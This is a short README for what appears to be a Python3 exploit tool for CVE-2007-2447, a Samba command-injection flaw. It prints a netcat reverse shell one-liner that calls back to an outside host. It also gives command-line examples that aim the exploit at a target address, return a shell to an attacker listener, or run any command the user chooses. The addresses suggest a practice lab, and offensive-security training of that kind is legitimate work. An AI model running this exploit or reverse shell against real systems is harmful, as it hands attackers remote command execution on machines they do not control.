This repository contains my exploit code for CVE-2007-2447 written in Python3. By default it sends a Netcat OpenBSD reverse shell on port 443 to the target host, but you can also specify a custom command.
# Netcat OpenBSD reverse shell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4242 >/tmp/f
# Exploit target 10.129.232.46 on port 445, send back reverse shell to 10.10.14.82 on port 443
python3 CVE-2007-2447.py --rhost 10.129.232.46 --lhost 10.10.14.82
# With custom rport and lport
python3 CVE-2007-2447.py --rhost 10.129.232.46 --rport 4445 --lhost 10.10.14.82 --lport 31337
# Execute custom command and set timeout for slow hosts
python3 CVE-2007-2447.py --rhost 10.129.232.46 -c "ping -c 3 10.10.14.82" -t 10